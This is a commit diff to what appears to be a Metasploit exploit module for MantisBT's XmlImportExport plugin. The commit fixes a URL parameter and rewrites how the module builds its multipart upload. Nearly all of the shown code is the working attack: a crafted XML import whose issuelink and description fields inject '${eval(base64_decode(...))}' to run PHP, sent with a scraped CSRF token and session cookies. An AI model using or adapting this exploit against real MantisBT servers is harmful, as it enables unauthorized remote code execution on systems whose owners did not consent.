Fix issues reported by wchen-r7 and mmetince

itsecurityco · itsecurityco · commit d4bbf0fe3970 · 2014-11-10T15:27:10.000-05:00
diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -67,12 +67,18 @@ def exec_php(php_code, is_check = false)
     rand_text = Rex::Text.rand_text_alpha_upper(5, 8)
     rand_num = Rex::Text.rand_text_numeric(1, 9)
 
+    if is_check
+      timeout = 20
+    else
+      timeout = 3
+    end
+
     print_status("Checking access to MantisBT...")
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
       'vars_get' => {
-        'return'  => normalize_uri(target_uri.path, 'plugin.php?=XmlImportExport/import'),
+        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
       }
     })
 
@@ -163,64 +169,41 @@ def exec_php(php_code, is_check = false)
       return false
     end
 
-    if is_check
-      timeout = 20
-    else
-      timeout = 3
-    end
-
-    uid  = rand_text_numeric(29).to_s
-
-    data =  "-----------------------------#{ uid }\r\n"
-    data << "Content-Disposition: form-data; name=\"plugin_xml_import_action_token\"\r\n\r\n"
-    data << "#{ csrf_token }\r\n"
-    data <<  "-----------------------------#{ uid }\r\n"
-    data << "Content-Disposition: form-data; name=\"project_id\"\r\n\r\n"
-    data << "#{ project_id }\r\n"
-    data <<  "-----------------------------#{ uid }\r\n"
-    data <<  "Content-Disposition: form-data; name=\"max_file_size\"\r\n\r\n"
-    data <<  "#{ max_file_size }\r\n"
-    data <<  "-----------------------------#{ uid }\r\n"
-    data <<  "Content-Disposition: form-data; name=\"step\"\r\n\r\n"
-    data <<  "#{ step }\r\n"
-    data <<  "-----------------------------#{ uid }\r\n"
-    data <<  "Content-Disposition: form-data; name=\"file\"; filename=\"#{ rand_text }.xml\r\n"
-    data <<  "Content-Type: text/xml\r\n\r\n"
-    data <<  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
-    data <<  "<mantis version=\"1.2.17\" urlbase=\"http://localhost/\" issuelink=\"${eval(base64_decode(#{ payload_b64 }))}}\" notelink=\"~\" format=\"1\">\r\n"
-    data <<  "    <issue>\r\n"
-    data <<  "        <id>#{ rand_num }</id>\r\n"
-    data <<  "        <project id=\"#{ project_id }\">#{ rand_text }</project>\r\n"
-    data <<  "        <reporter id=\"#{ rand_num }\">#{ rand_text }</reporter>\r\n"
-    data <<  "        <priority id=\"30\">normal</priority>\r\n"
-    data <<  "        <severity id=\"50\">minor</severity>\r\n"
-    data <<  "        <reproducibility id=\"70\">have not tried</reproducibility>\r\n"
-    data <<  "        <status id=\"#{ rand_num }\">new</status>\r\n"
-    data <<  "        <resolution id=\"#{ rand_num }\">open</resolution>\r\n"
-    data <<  "        <projection id=\"#{ rand_num }\">none</projection>\r\n"
-    data <<  "        <category id=\"#{ category_id }\">#{ category_name }</category>\r\n"
-    data <<  "        <date_submitted>1415492267</date_submitted>\r\n"
-    data <<  "        <last_updated>1415507582</last_updated>\r\n"
-    data <<  "        <eta id=\"#{ rand_num }\">none</eta>\r\n"
-    data <<  "        <view_state id=\"#{ rand_num }\">public</view_state>\r\n"
-    data <<  "        <summary>#{ rand_text }</summary>\r\n"
-    data <<  "        <due_date>1</due_date>\r\n"
-    data <<  "        <description>{${eval(base64_decode(#{ payload_b64 }))}}1</description>\r\n"
-    data <<  "    </issue>\r\n"
-    data <<  "</mantis>\r\n\r\n"
-    data <<  "-----------------------------#{ uid }\r\n"
-    data <<  "Content-Disposition: form-data; name=\"strategy\"\r\n\r\n"
-    data <<  "renumber\r\n"
-    data <<  "-----------------------------#{ uid }\r\n"
-    data <<  "Content-Disposition: form-data; name=\"fallback\"\r\n\r\n"
-    data <<  "link\r\n"
-    data <<  "-----------------------------#{ uid }\r\n"
-    data <<  "Content-Disposition: form-data; name=\"keepcategory\"\r\n\r\n"
-    data <<  "on\r\n"
-    data <<  "-----------------------------#{ uid }\r\n"
-    data <<  "Content-Disposition: form-data; name=\"defaultcategory\"\r\n\r\n"
-    data <<  "#{ category_id }\r\n"
-    data <<  "-----------------------------#{ uid }--\r\n\r\n"
+    xml_file =   %Q|
+    <mantis version="1.2.17" urlbase="http://localhost/" issuelink="${eval(base64_decode(#{ payload_b64 }))}}" notelink="~" format="1">
+        <issue>
+            <id>#{ rand_num }</id>
+            <project id="#{ project_id }">#{ rand_text }</project>
+            <reporter id="#{ rand_num }">#{ rand_text }</reporter>
+            <priority id="30">normal</priority>
+            <severity id="50">minor</severity>
+            <reproducibility id="70">have not tried</reproducibility>
+            <status id="#{ rand_num }">new</status>
+            <resolution id="#{ rand_num }">open</resolution>
+            <projection id="#{ rand_num }">none</projection>
+            <category id="#{ category_id }">#{ category_name }</category>
+            <date_submitted>1415492267</date_submitted>
+            <last_updated>1415507582</last_updated>
+            <eta id="#{ rand_num }">none</eta>
+            <view_state id="#{ rand_num }">public</view_state>
+            <summary>#{ rand_text }</summary>
+            <due_date>1</due_date>
+            <description>{${eval(base64_decode(#{ payload_b64 }))}}1</description>
+        </issue>
+    </mantis>
+    |
+
+    data = Rex::MIME::Message.new
+    data.add_part("#{ csrf_token }", nil, nil, "form-data; name=\"plugin_xml_import_action_token\"")
+    data.add_part("#{ project_id }", nil, nil, "form-data; name=\"project_id\"")
+    data.add_part("#{ max_file_size }", nil, nil, "form-data; name=\"max_file_size\"")
+    data.add_part("#{ step }", nil, nil, "form-data; name=\"step\"")
+    data.add_part(xml_file, "text/xml", "UTF-8", "form-data; name=\"file\"; filename=\"#{ rand_text }.xml\"")
+    data.add_part("renumber", nil, nil, "form-data; name=\"strategy\"")
+    data.add_part("link", nil, nil, "form-data; name=\"fallback\"")
+    data.add_part("on", nil, nil, "form-data; name=\"keepcategory\"")
+    data.add_part("#{ category_id }", nil, nil, "form-data; name=\"defaultcategory\"")
+    data_post = data.to_s
 
     print_status("Sending payload...")
     res = send_request_cgi({
@@ -229,8 +212,8 @@ def exec_php(php_code, is_check = false)
       'headers' => {
         'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
       },
-      'ctype'   => "multipart/form-data; boundary=---------------------------#{ uid }",
-      'data'    => data,
+      'ctype'   => "multipart/form-data; boundary=#{ data.bound }",
+      'data'    => data_post,
     }, timeout)
 
     res_payload = res
